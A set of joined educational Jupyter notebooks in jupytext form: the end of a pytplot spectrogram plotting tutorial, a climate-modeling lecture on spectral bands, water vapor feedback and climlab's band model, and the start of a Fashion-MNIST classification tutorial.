# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="irquvNRn_mQb" outputId="cef88205-48c4-4f0c-ead0-ddc22ac4c2b8"
tplot('data')
# + [markdown] id="JFl0hctvWnvf"
# To automatically interpolate in the x-direction, use the `x_interp` option
# + id="zUA49iQj_mxJ"
options('data', 'x_interp', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="ssKfD-B__rxP" outputId="8294a0a4-6dca-4d81-f175-9e9e069aa41d"
tplot('data')
# + [markdown] id="pySQKjb6WtOt"
# To automatically interpolate in the y-direction, turn off x-interpolation and turn on y-interpolation:
# + id="ySw5030k_tHL"
options('data', 'x_interp', False)
options('data', 'y_interp', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="RtYex9rr_zXC" outputId="c3ac9b50-eb84-477e-c1fb-4b4fa6c045e7"
tplot('data')
# + [markdown] id="q1-qP3iMWzN6"
# Turn interpolation on in both the x and y directions
# + id="vSsB4f4L_z6q"
options('data', 'x_interp', True)
options('data', 'y_interp', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="wjqg9JoA_2lL" outputId="9a7e5366-7b5d-49d1-e96b-a2e375621fea"
tplot('data')
# + [markdown] id="xJWy2dNyW5WJ"
# Change the number of data points in the interpolation in the x-direction
# + id="6yUBL5Ip_3M_"
options('data', 'x_interp_points', 10)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="fnDI5MFAAA1U" outputId="f59faf35-c92f-4dbd-c795-848f4a9bc4ff"
tplot('data')
# + [markdown] id="IgM-gqNGW-m4"
# Change the number of data points in the y-direction
# + id="pJiHAZZnABW_"
options('data', 'y_interp_points', 10)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="8s5zry59AE_7" outputId="145a624a-4f61-4cd8-fee8-6ef047d687c2"
tplot('data')
# + [markdown] id="n8DpEaD8XEiT"
# Turn the y-axis to log scale
# + id="a1pL682OAF9i"
options('data', 'ylog', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="tXSPEXR8ARWD" outputId="b73e7a23-8e09-4756-ea3e-74fe8dd927b7"
tplot('data')
# + [markdown] id="2TeJ0vzDXPbF"
# Set the z-axis to a log scale
# + id="7ZwtSp57ARxn"
options('data', 'zlog', True)
# + [markdown] id="Cfu1Qfl3VhrE"
# Note: for some reason, we need to change the `zrange` to remove the 0 in the log scale
# + id="jVSJKLx3AVmJ"
options('data', 'zrange', [0.0001, 24])
options('data', 'yrange', [10, 50])
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="_w7V9tEyAeWn" outputId="a0f0b2cf-19c1-42ee-8328-7e1df8accf48"
tplot('data')
# + [markdown] id="zAFJiJUfXV-n"
# Change the opacity using the `alpha` option
# + id="IkO_Tox2Ae3Y"
options('data', 'alpha', 0.5)
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="6Wdo6-iQBK8-" outputId="63af8c1b-5ab8-4768-bd27-4f80ce37c21e"
tplot('data')
# + [markdown] id="U4bUrIAjXc2b"
# Create a simple line variable with 5 data points at 30.0
# + colab={"base_uri": "https://localhost:8080/"} id="rCbh8cr9BLo3" outputId="786f6129-6457-45eb-bc15-f8755c12bf15"
store_data('line', data={'x': [1, 2, 3, 4, 5], 'y': [30]*5})
# + [markdown] id="iTOPlAJgXhUl"
# Create a pseudo variable combining the spectrogram and the line
# + colab={"base_uri": "https://localhost:8080/"} id="K3ADyJppBWY2" outputId="a73c7d15-f454-44de-f3d8-21e295fe694d"
store_data('combined', data='data line')
# + [markdown] id="aeqh4J4nXriS"
# Turn the y/z logs back to linear, and set the alpha back to 1
# + id="4yGjZLEYBblV"
options('data', 'zlog', False)
options('data', 'ylog', False)
options('data', 'alpha', 1)
# + [markdown] id="4GTKLfY6XwPA"
# Plot the combined variable
# + colab={"base_uri": "https://localhost:8080/", "height": 612} id="ONrXwDvjBoa9" outputId="45c4c030-982e-4643-f3da-d40f5ccee89c"
tplot('combined')
# + [markdown] id="aUZaG3xSXyMK"
# Increase the margin size on the right-side of the panel
# + id="e-_whtjWBpLB"
from pytplot import tplot_options
tplot_options('xmargin', [0.1, 0.25])
# + colab={"base_uri": "https://localhost:8080/", "height": 612} id="mjpEHXKWB85L" outputId="eb1017e2-44f8-4c85-d549-92308dd78fdb"
tplot('combined')
# + [markdown] id="GOi0nLcCX2nZ"
# By default, both the spectra and the lines share the y-axis. To move the line plot to the right axis, set the `right_axis` option
# + id="9N4SmCHoB91j"
options('combined', 'right_axis', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="bddSBJ3-CEaa" outputId="236f9457-e16b-48dc-e604-c81e1acc6869"
tplot('combined')
# + [markdown] id="gPPHMJ_PYJg6"
# All of the standard options should work, e.g., to add + markers at the data locations:
# + id="t7G-R5ECCFwZ"
options('line', 'marker', '+')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="VIugOCT1CYco" outputId="115372e2-3d69-4b7f-c54f-154db7a7d3ab"
tplot('combined')
# + [markdown] id="gUXED2JIYPuL"
# And you can update the yrange of the line:
# + id="dPreZjN1CZNx"
options('line', 'yrange', [29, 31])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="0bUQTFevCf0j" outputId="af7d98c4-0922-48c9-e171-44560c4b2f5c"
tplot('combined')
# + [markdown] id="GFGuu9zvYSyS"
# Add a legend to the line:
# + id="G2u1FDzeCgzH"
options('line', 'legend_names', 'Line')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="4yR1n7aTCnXP" outputId="ffcf48a3-aea2-407b-a148-1e399b678127"
tplot('combined')
# + [markdown] id="mZpltUtdYU_y"
# Set the title of the color bar:
# + id="yQh9z_DpCoNw"
options('data', 'ztitle', 'Colorbar title')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="g5Ri9qOFC1Ho" outputId="8d6b5ca0-f0b6-43f0-bf20-086d057cb01f"
tplot('combined')
# + [markdown] id="93RJ5dKiYW3a"
# Set the z-axis subtitle:
# + id="E8iqcr4GC2h4"
options('data', 'zsubtitle', '[colorbar units]')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="onDCRCzTC7_1" outputId="2dcef482-7964-4703-ef03-cf263da1eb60"
tplot('combined')
# + id="gcl665CQTsz_"
|
pyspedas_examples/notebooks/PyTplot_spectrogram_options.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] slideshow={"slide_type": "slide"}
# # [ATM 623: Climate Modeling](../index.ipynb)
#
# [<NAME>](http://www.atmos.albany.edu/facstaff/brose/index.html), University at Albany
#
# # Lecture 9: Who needs spectral bands? We do. Some baby steps...
# + [markdown] slideshow={"slide_type": "skip"}
# ### About these notes:
#
# This document uses the interactive [`Jupyter notebook`](https://jupyter.org) format. The notes can be accessed in several different ways:
#
# - The interactive notebooks are hosted on `github` at https://github.com/brian-rose/ClimateModeling_courseware
# - The latest versions can be viewed as static web pages [rendered on nbviewer](http://nbviewer.ipython.org/github/brian-rose/ClimateModeling_courseware/blob/master/index.ipynb)
# - A complete snapshot of the notes as of May 2017 (end of spring semester) are [available on Brian's website](http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2017/Notes/index.html).
#
# [Also here is a legacy version from 2015](http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2015/Notes/index.html).
#
# Many of these notes make use of the `climlab` package, available at https://github.com/brian-rose/climlab
# -
# Ensure compatibility with Python 2 and 3
from __future__ import print_function, division
# + [markdown] slideshow={"slide_type": "slide"}
# ## Contents
#
# 1. [What if CO$_2$ actually behaved like a Grey Gas?](#section1)
# 2. [Another look at observed spectra](#section2)
# 3. [Water vapor changes under global warming](#section3)
# 4. [A simple water vapor parameterization](#section4)
# 5. [Modeling spectral bands with the `climlab.BandRCModel` process](#section5)
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section1'></a>
#
# ## 1. What if CO$_2$ actually behaved like a Grey Gas?
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# Suppose that CO$_2$ actually behaved as a grey gas. In other words, no spectral dependence in absorptivity.
#
# If we then **double the CO2 concentration** in the atmosphere, we double the number of absorbers. This should imply that we also **double the absorption cross-section**:
#
# $$ \kappa^\prime = 2 ~ \kappa $$
# + [markdown] slideshow={"slide_type": "slide"}
# This would imply that we **double the optical thickness of every layer**:
#
# $$ \Delta \tau^\prime = 2 \left( -\frac{\kappa}{g} \Delta p \right) = 2 ~ \Delta \tau$$
# + [markdown] slideshow={"slide_type": "slide"}
# And since (from [Lecture 8](./Lecture08 -- Modeling non-scattering radiative transfer.ipynb)) the absorptivity / emissivity of each layer is
#
# $$ \epsilon = 1 - \exp\big( - \Delta \tau \big) $$
#
# the **modified absorptivity** is
#
# $$ \epsilon^\prime = 1 - \exp\big( - 2\Delta \tau \big) = 1 - \left( \exp\big( - \Delta \tau \big)\right)^2 = 1 - (1-\epsilon)^2 $$
# or simply
# $$ \epsilon^\prime = 2 \epsilon - \epsilon^2 $$
#
# (Note that $\epsilon^\prime \approx 2 \epsilon$ for very thin layers, for which $\epsilon$ is small).
# + [markdown] slideshow={"slide_type": "slide"}
# ### What does our 2-layer analytical model then say about the radiative forcing?
#
# Recall that we tuned the two-layer model with
#
# $$ \epsilon = 0.586 $$
#
# to get the observed OLR with observed temperatures.
# + slideshow={"slide_type": "slide"}
# Applying the above formula
eps = 0.586
print( 'Doubling a grey gas absorber would \
change the absorptivity from {:.3} \
to {:.3}'.format(eps, 2*eps - eps**2))
# + [markdown] slideshow={"slide_type": "-"}
# **If CO2 behaved like a grey gas**, doubling it would cause a huge increase in the absorptivity of each layer!
# + [markdown] slideshow={"slide_type": "slide"}
# Back in [Lecture 6](Lecture06 -- Elementary greenhouse models.ipynb) we worked out that the radiative forcing in this model (with the observed lapse rate) is about +2.2 W m$^{-2}$ for an increase of 0.01 in $\epsilon$.
#
# **This means that our hypothetical doubling of "grey CO$_2$" should yield a radiative forcing of 53.5 W m$^{-2}$.**
#
# This is an absolutely enormous number. Assuming a net climate feedback of -1.3 W m$^{-2}$ K$^{-1}$
# (consistent with the AR5 ensemble)
# would then give us an **equilibrium climate sensitivity of 41 K**.
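# + [markdown] slideshow={"slide_type": "slide"}
# The back-of-envelope numbers above can be reproduced directly (the +2.2 W m$^{-2}$ per 0.01 of $\epsilon$ and the -1.3 W m$^{-2}$ K$^{-1}$ feedback are the values quoted in the text):
# -

```python
# Hypothetical grey-gas CO2 doubling: radiative forcing and implied sensitivity
eps = 0.586                     # tuned two-layer emissivity
eps_doubled = 2*eps - eps**2    # absorptivity after doubling a grey absorber
forcing = (eps_doubled - eps) / 0.01 * 2.2   # +2.2 W/m2 per 0.01 increase in epsilon
lambda_net = 1.3                # magnitude of the net feedback, W/m2/K
ecs = forcing / lambda_net      # equilibrium warming
print('Forcing: {:.1f} W/m2, ECS: {:.0f} K'.format(forcing, ecs))
```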
# + [markdown] slideshow={"slide_type": "slide"}
# ### Conclusions:
#
# 1. **If CO2 did behave like a grey gas, we would be toast.**
# 2. The Grey Gas model is insufficient for understanding radiative forcing and feedback.
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section2'></a>
#
# ## 2. Another look at observed spectra
# ____________
#
# It's time to move away from the Grey Gas approximation and look more carefully at the actual observed spectra of solar and terrestrial radiation.
# + [markdown] slideshow={"slide_type": "slide"}
# ### Observed solar spectra
#
# The following figure shows observed spectra of solar radiation at TOA and at the surface, along with the theoretical Planck function for a blackbody at 5525 K.
# + slideshow={"slide_type": "slide"}
from IPython.display import Image
Image('../images/Solar_spectrum.png')
# + [markdown] slideshow={"slide_type": "slide"}
# > This figure shows the solar radiation spectrum for direct light at both the top of the Earth's atmosphere and at sea level. The sun produces light with a distribution similar to what would be expected from a 5525 K (5250 °C) blackbody, which is approximately the sun's surface temperature. As light passes through the atmosphere, some is absorbed by gases with specific absorption bands. Additional light is redistributed by Rayleigh scattering, which is responsible for the atmosphere's blue color. These curves are based on the American Society for Testing and Materials (ASTM) Terrestrial Reference Spectra, which are standards adopted by the photovoltaics industry to ensure consistent test conditions and are similar to the light that could be expected in North America. Regions for ultraviolet, visible and infrared light are indicated.
#
# Source: http://commons.wikimedia.org/wiki/File:Solar_spectrum_en.svg
# + [markdown] slideshow={"slide_type": "slide"}
# - The figure shows that the incident beam at TOA has the shape of a blackbody radiator.
# - By the time the beam arrives at the surface, it is strongly depleted at specific wavelengths.
# - Absorption by O$_3$ (ozone) depletes almost the entire ultraviolet spectrum.
# - Weaker absorption features, mostly due to H$_2$O, deplete some parts of the near-infrared.
# - Note that the depletion in the visible band is mostly due to scattering, which depletes the direct beam but contributes diffuse radiation (so we can still see when it's cloudy!)
# + [markdown] slideshow={"slide_type": "slide"}
# ### Observed terrestrial spectra
#
# This figure shows the Planck function for Earth's surface temperature compared with the spectrum observed from space.
# + slideshow={"slide_type": "slide"}
Image('../images/Terrestrial_spectrum.png')
# -
# Source: https://www.e-education.psu.edu/earth103/node/671
# + [markdown] slideshow={"slide_type": "slide"}
# Careful: I'm pretty sure what is plotted here is not the **total** observed spectrum, but rather the part of the **emissions from the surface** that **actually makes it out to space**.
#
# As we know, the terrestrial beam from the surface is depleted by absorption by many greenhouse gases, but principally CO$_2$ and H$_2$O.
#
# However there is a spectral band centered on 10 $\mu$m in which the greenhouse effect is very weak. This is the so-called **window region** in the spectrum.
#
# Since absorption is so strong across most of the rest of the infrared spectrum, this window region is a key determinant of the overall greenhouse effect.
# + [markdown] slideshow={"slide_type": "slide"}
# #### One very big shortcoming of the Grey Gas model: it ignores the window region
#
# We would therefore like to start using a model that includes enough spectral information that it represents
#
# - the mostly strong CO2 absorption outside the window region
# - the weak absorption inside the window region
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section3'></a>
#
# ## 3. Water vapor changes under global warming
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# Another big shortcoming of the Grey Gas model is that it cannot represent the **water vapor feedback**.
#
# We have seen above that H$_2$O is an important absorber in both longwave and shortwave spectra.
#
# We also know that the water vapor load in the atmosphere increases as the climate warms. The primary reason is that the **saturation vapor pressure** increases strongly with temperature.
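# + [markdown] slideshow={"slide_type": "slide"}
# To get a feel for how strong that temperature dependence is, here is a quick calculation using the Bolton (1980) empirical fit for saturation vapor pressure over liquid water (the choice of this particular formula is mine; the lecture does not prescribe one):
# -

```python
import numpy as np

def saturation_vapor_pressure(T):
    """Bolton (1980) fit: saturation vapor pressure (hPa) over liquid water; T in Kelvin."""
    Tc = T - 273.15
    return 6.112 * np.exp(17.67 * Tc / (Tc + 243.5))

# Fractional increase per kelvin near a typical surface temperature (~288 K)
es288 = saturation_vapor_pressure(288.)
es289 = saturation_vapor_pressure(289.)
print('~{:.1f}% more saturation vapor pressure per K of warming'.format(100*(es289/es288 - 1)))
```

This is the familiar "roughly 7% per degree" Clausius-Clapeyron scaling that underlies the water vapor increase discussed below.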
# + [markdown] slideshow={"slide_type": "slide"}
# ### Evidence from CESM simulations
#
# Let's take a look at changes in the mean water vapor fields in the CESM model after a doubling of CO$_2$.
# + slideshow={"slide_type": "-"}
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import xarray as xr
# NumPy ufuncs apply directly to xarray objects (the old xarray.ufuncs module is deprecated)
from numpy import cos, deg2rad, log
# Disable interactive plotting (use explicit display calls to show figures)
plt.ioff()
# -
# Open handles to the data files
datapath = "http://ramadda.atmos.albany.edu:8080/repository/opendap/latest/Top/Users/BrianRose/CESM_runs/"
endstr = "/entry.das"
ctrl = xr.open_dataset(datapath + 'som_control/som_control.cam.h0.clim.nc' + endstr, decode_times=False)
co2 = xr.open_dataset(datapath + 'som_2xCO2/som_2xCO2.cam.h0.clim.nc' + endstr, decode_times=False)
# + slideshow={"slide_type": "-"}
# Plot cross-sections of the following anomalies under 2xCO2:
# - Temperature
# - Specific humidity
# - Relative humidity
fig, axes = plt.subplots(1,3, figsize=(16,6))
ax = axes[0]
CS = ax.contourf(ctrl.lat, ctrl.lev, (co2['T'] - ctrl['T']).mean(dim=('time','lon')),
levels=np.arange(-11,12,1), cmap=plt.cm.seismic)
ax.set_title('Temperature (K)')
fig.colorbar(CS, orientation='horizontal', ax=ax)
ax = axes[1]
CS = ax.contourf(ctrl.lat, ctrl.lev, (co2['Q'] - ctrl['Q']).mean(dim=('time','lon'))*1000,
levels=np.arange(-3,3.25,0.25), cmap=plt.cm.seismic)
ax.set_title('Specific humidity (g/kg)')
fig.colorbar(CS, orientation='horizontal', ax=ax)
ax = axes[2]
CS = ax.contourf(ctrl.lat, ctrl.lev, (co2['RELHUM'] - ctrl['RELHUM']).mean(dim=('time','lon')),
levels=np.arange(-11,12,1), cmap=plt.cm.seismic)
ax.set_title('Relative humidity (%)')
fig.colorbar(CS, orientation='horizontal', ax=ax)
for ax in axes:
ax.invert_yaxis()
ax.set_xticks([-90, -60, -30, 0, 30, 60, 90]);
ax.set_xlabel('Latitude')
ax.set_ylabel('Pressure')
fig.suptitle('Anomalies for 2xCO2 in CESM slab ocean simulations', fontsize=16);
# + slideshow={"slide_type": "slide"}
fig
# + [markdown] slideshow={"slide_type": "slide"}
# ### What do you see here?
#
# - Where does the largest warming occur?
# - Where does the largest moistening occur?
# + [markdown] slideshow={"slide_type": "slide"}
# In fact the specific humidity anomaly has roughly the same shape as the specific humidity field itself -- **it is largest where the temperature is highest**. This is a consequence of the Clausius-Clapeyron relation.
#
# The **relative humidity** anomaly is
#
# - overall rather small (just a few percent)
# - Largest in cold places where the specific humidity is very small.
# + [markdown] slideshow={"slide_type": "slide"}
# The smallness of the relative humidity change is a rather remarkable result.
#
# This is not something we can derive from first principles. It is an emergent property of the GCMs. However it is a very robust feature of global warming simulations.
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section4'></a>
#
# ## 4. A simple water vapor parameterization
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# ### A credible climate model needs a water vapor feedback
#
# If relative humidity is nearly constant under global warming, and water vapor is a greenhouse gas, this implies a positive feedback that will amplify the warming for a given radiative forcing.
#
# Thus far our simple models have ignored this process, and we have not been able to use them to assess the climate sensitivity.
# + [markdown] slideshow={"slide_type": "slide"}
# To proceed towards more realistic models, we have two options:
#
# - **Simulate** all the evaporation, condensation and transport processes that determine the time-mean water vapor field (as is done in the CESM).
# - **Parameterize** the dependence of water vapor on temperature by insisting that relative humidity stays constant as the climate changes.
#
# We will now explore this second option, so that we can continue to think of the global energy budget under climate change as a process occurring in a single column.
# + [markdown] slideshow={"slide_type": "slide"}
# ### Manabe's constant relative humidity parameterization
#
# We are going to adopt a parameterization first used in a very famous paper:
#
# > <NAME>. and <NAME>. (1967). Thermal equilibrium of the atmosphere with a given distribution of relative humidity. J. Atmos. Sci., 24(3):241–259.
#
# This paper was the first to give a really credible calculation of climate sensitivity to a doubling of CO2 by accounting for the known spectral properties of CO2 and H2O absorption, as well as the water vapor feedback!
# + [markdown] slideshow={"slide_type": "slide"}
# The parameterization is very simple:
#
# We assume that the relative humidity $r$ is a linear function of pressure $p$:
#
# $$ r = r_s \left( \frac{p/p_s - 0.02}{1 - 0.02} \right) $$
#
# where $p_s = 1000$ hPa is the surface pressure, and $r_s$ is a prescribed surface value of relative humidity. Manabe and Wetherald set $r_s = 0.77$, but we should consider this a tunable parameter in our parameterization.
# + [markdown] slideshow={"slide_type": "slide"}
# Since this formula gives a negative number above 20 hPa, we also assume that the **specific humidity** has a minimum value of $0.005$ g/kg (a typical stratospheric value).
#
# This formula is implemented in `climlab.radiation.ManabeWaterVapor()`
#
# Using this parameterization, the surface and tropospheric specific humidity will always increase as the temperature increases.
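# + [markdown] slideshow={"slide_type": "slide"}
# A minimal standalone sketch of the relative humidity profile (note that in `climlab` the stratospheric floor is applied to the specific humidity, not the relative humidity, so here we simply clip negative values at zero for illustration):
# -

```python
import numpy as np

def manabe_relative_humidity(p, ps=1000., rs=0.77):
    """Manabe & Wetherald (1967) relative humidity profile; p and ps in hPa."""
    r = rs * (p/ps - 0.02) / (1 - 0.02)
    return np.maximum(r, 0.)   # clip the negative values that occur above ~20 hPa

p = np.array([1000., 500., 100., 10.])
print(manabe_relative_humidity(p))   # 0.77 at the surface, decreasing to 0 aloft
```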
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
# <a id='section5'></a>
#
# ## 5. Modeling spectral bands with the `climlab.BandRCModel` process
# ____________
# + [markdown] slideshow={"slide_type": "slide"}
# Here is a brief introduction to the `climlab.BandRCModel` process.
#
# This is a model that divides the spectrum into 7 distinct bands: three shortwave and four longwave.
#
# As we will see, the process works much like the familiar `climlab.RadiativeConvectiveModel`.
# + [markdown] slideshow={"slide_type": "slide"}
# ## About the spectra
#
# ### Shortwave
#
# The shortwave is divided into three channels:
#
# - Channel 0 is the Hartley and Huggins band (extreme UV, 200 - 340 nm, 1% of total flux, strong ozone absorption)
# - Channel 1 is Chappuis band (450 - 800 nm, 27% of total flux, moderate ozone absorption)
# - Channel 2 is the remaining radiation (72% of total flux, largely in the visible range, no ozone absorption)
#
#
#
# + [markdown] slideshow={"slide_type": "slide"}
# ### Longwave
#
# The longwave is divided into four bands:
#
# - Band 0 is the **window region** (between 8.5 and 11 $\mu$m), 17% of total flux.
# - Band 1 is the CO2 absorption channel (the band of strong absorption by CO2 around 15 $\mu$m), 15% of total flux
# - Band 2 is a weak water vapor absorption channel, 35% of total flux
# - Band 3 is a strong water vapor absorption channel, 33% of total flux
#
# The longwave decomposition is not as easily related to specific wavelengths, as in reality there is a lot of overlap between H$_2$O and CO$_2$ absorption features (as well as absorption by other greenhouse gases such as CH$_4$ and N$_2$O that we are not representing).
# + [markdown] slideshow={"slide_type": "slide"}
# ### Example usage of the spectral model
# -
import climlab
from climlab import constants as const
# First try a model with all default parameters. Usage is very similar to the familiar `RadiativeConvectiveModel`.
col1 = climlab.BandRCModel()
print( col1)
# + [markdown] slideshow={"slide_type": "slide"}
# Check out the list of subprocesses.
#
# We now have a process called `H2O`, in addition to things we've seen before.
#
# The state variables are still just temperatures:
# -
col1.state
# + [markdown] slideshow={"slide_type": "slide"}
# But the model has a new input field for specific humidity:
# -
col1.q
# + [markdown] slideshow={"slide_type": "slide"}
# The `H2O` process sets the specific humidity field at every timestep to a specified profile, determined by air temperatures. More on that below. For now, let's compute a radiative equilibrium state.
# -
col1.integrate_years(2)
# Check for energy balance
col1.ASR - col1.OLR
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( col1.Tatm, col1.lev, 'c-', label='default' )
ax.plot( col1.Ts, climlab.constants.ps, 'co', markersize=16 )
ax.invert_yaxis()
ax.set_xlabel('Temperature (K)', fontsize=16)
ax.set_ylabel('Pressure (hPa)', fontsize=16 )
ax.set_title('Temperature profiles', fontsize = 18)
ax.grid()
fig
# + [markdown] slideshow={"slide_type": "slide"}
# By default this model has convective adjustment. We can set the adjusted lapse rate by passing a parameter when we create the model.
#
# The model currently has no ozone (so there is no stratosphere). Not very realistic!
#
# + [markdown] slideshow={"slide_type": "slide"}
# ### About the radiatively active gases
# -
# The Band model is aware of three different absorbing gases: O3 (ozone), CO2, and H2O (water vapor). The abundances of these gases are stored in a dictionary of arrays as follows:
col1.absorber_vmr
# + [markdown] slideshow={"slide_type": "slide"}
# Ozone and CO2 are both specified in the model. The default, as you see above, is zero ozone, and constant (well-mixed) CO2 at a volume mixing ratio of 3.8E-4 or 380 ppm.
# + [markdown] slideshow={"slide_type": "slide"}
# Water vapor is handled differently: it is determined by the model at each timestep. We make the following assumptions, following a classic paper on radiative-convective equilibrium by Manabe and Wetherald (J. Atmos. Sci. 1967):
#
# - the relative humidity just above the surface is fixed at 77% (can be changed of course... see the parameter `col1.relative_humidity`)
# - water vapor drops off linearly with pressure
# - there is a small specified amount of water vapor in the stratosphere.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Putting in some ozone
# -
# We need to provide some ozone data to the model in order to simulate a stratosphere. We will read in some ozone data just as we did in [Lecture 7](Lecture07 -- Grey radiation modeling with climlab.ipynb).
ozone = xr.open_dataset( datapath + 'som_input/ozone_1.9x2.5_L26_2000clim_c091112.nc' + endstr )
# + slideshow={"slide_type": "slide"}
# Take the global, annual average
weight_ozone = cos(deg2rad(ozone.lat)) / cos(deg2rad(ozone.lat)).mean(dim='lat')
O3_global = (ozone.O3 * weight_ozone).mean(dim=('lat','lon','time'))
print(O3_global)
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( O3_global*1E6, ozone.lev)
ax.invert_yaxis()
ax.set_xlabel('Ozone (ppm)', fontsize=16)
ax.set_ylabel('Pressure (hPa)', fontsize=16 )
ax.set_title('Global, annual mean ozone concentration', fontsize = 16);
fig
# + [markdown] slideshow={"slide_type": "slide"}
# We are going to create another instance of the model, this time using the same vertical coordinates as the ozone data.
# -
# Create the column with appropriate vertical coordinate, surface albedo and convective adjustment
col2 = climlab.BandRCModel(lev=ozone.lev)
print( col2)
# + slideshow={"slide_type": "slide"}
# Set the ozone mixing ratio
col2.absorber_vmr['O3'] = O3_global.values
# -
# Run the model out to equilibrium!
col2.integrate_years(2.)
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( col1.Tatm, np.log(col1.lev/1000), 'c-', label='RCE' )
ax.plot( col1.Ts, 0, 'co', markersize=16 )
ax.plot(col2.Tatm, np.log(col2.lev/1000), 'r-', label='RCE O3' )
ax.plot(col2.Ts, 0, 'ro', markersize=16 )
ax.invert_yaxis()
ax.set_xlabel('Temperature (K)', fontsize=16)
ax.set_ylabel('log(Pressure)', fontsize=16 )
ax.set_title('Temperature profiles', fontsize = 18)
ax.grid(); ax.legend()
fig
# + [markdown] slideshow={"slide_type": "slide"}
# Once we include ozone we get a well-defined stratosphere.
#
# Things to consider / try:
#
# - Here we used the global annual mean Q = 341.3 W m$^{-2}$. We might want to consider latitudinal or seasonal variations in Q.
# - We also used the global annual mean ozone profile! Ozone varies tremendously in latitude and by season. That information is all contained in the ozone data file we opened above. We might explore the effects of those variations.
# - We can calculate climate sensitivity in this model by doubling the CO2 concentration and re-running out to the new equilibrium. Does the amount of ozone affect the climate sensitivity? (example below)
# - An important shortcoming of the model: there are no clouds! (that would be the next step in the hierarchy of column models)
# - Clouds would act both in the shortwave (increasing the albedo, cooling the climate) and in the longwave (greenhouse effect, warming the climate). Which effect is stronger depends on the vertical structure of the clouds (high or low clouds) and their optical properties (e.g. thin cirrus clouds are nearly transparent to solar radiation but are good longwave absorbers).
# + slideshow={"slide_type": "slide"}
col3 = climlab.process_like(col2)
print( col3)
# -
# Let's double CO2.
col3.absorber_vmr['CO2'] *= 2.
col3.compute_diagnostics()
print( 'The radiative forcing for doubling CO2 is %f W/m2.' % (col2.diagnostics['OLR'] - col3.diagnostics['OLR']))
# + slideshow={"slide_type": "slide"}
col3.integrate_years(3)
# -
col3.ASR - col3.OLR
print( 'The Equilibrium Climate Sensitivity is %f K.' % (col3.Ts - col2.Ts))
# + slideshow={"slide_type": "slide"}
# An example with no ozone
col4 = climlab.process_like(col1)
print( col4)
# -
col4.absorber_vmr['CO2'] *= 2.
col4.compute_diagnostics()
print( 'The radiative forcing for doubling CO2 is %f W/m2.' % (col1.OLR - col4.OLR))
# + slideshow={"slide_type": "slide"}
col4.integrate_years(3.)
col4.ASR - col4.OLR
# -
print( 'The Equilibrium Climate Sensitivity is %f K.' % (col4.Ts - col1.Ts))
# Interesting that the model is MORE sensitive when ozone is set to zero.
# + [markdown] slideshow={"slide_type": "skip"}
# <div class="alert alert-success">
# [Back to ATM 623 notebook home](../index.ipynb)
# </div>
# + [markdown] slideshow={"slide_type": "skip"}
# ____________
# ## Version information
# ____________
#
#
# + slideshow={"slide_type": "skip"}
# %load_ext version_information
# %version_information numpy, matplotlib, xarray, climlab
# + [markdown] slideshow={"slide_type": "slide"}
# ____________
#
# ## Credits
#
# The author of this notebook is [<NAME>](http://www.atmos.albany.edu/facstaff/brose/index.html), University at Albany.
#
# It was developed in support of [ATM 623: Climate Modeling](http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2015/), a graduate-level course in the [Department of Atmospheric and Environmental Sciences](http://www.albany.edu/atmos/index.php)
#
# Development of these notes and the [climlab software](https://github.com/brian-rose/climlab) is partially supported by the National Science Foundation under award AGS-1455071 to <NAME>. Any opinions, findings, conclusions or recommendations expressed here are mine and do not necessarily reflect the views of the National Science Foundation.
# ____________
# + slideshow={"slide_type": "skip"}
|
Lectures/Lecture09 -- Who needs spectral bands.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fashion MNIST Clothing Classification
# This tutorial is divided into the following sections:
#
# - Model Evaluation Methodology
# - How to Develop a Baseline Model
# - How to Develop an Improved Model
# - How to Finalize the Model and Make Predictions
# The Fashion-MNIST dataset is proposed as a more challenging replacement dataset for the MNIST dataset.
#
# It is a dataset comprised of 60,000 small square 28×28 pixel grayscale images of items of 10 types of clothing, such as shoes, t-shirts, dresses, and more. The mapping of all 0-9 integers to class labels is listed below.
#
# - 0: T-shirt/top
# - 1: Trouser
# - 2: Pullover
# - 3: Dress
# - 4: Coat
# - 5: Sandal
# - 6: Shirt
# - 7: Sneaker
# - 8: Bag
# - 9: Ankle boot
# It is a more challenging classification problem than MNIST and top results are achieved by deep learning convolutional neural networks with a classification accuracy of about 90% to 95% on the hold out test dataset.
#
# The example below loads the Fashion-MNIST dataset using the Keras API and creates a plot of the first nine images in the training dataset.
# example of loading the fashion mnist dataset
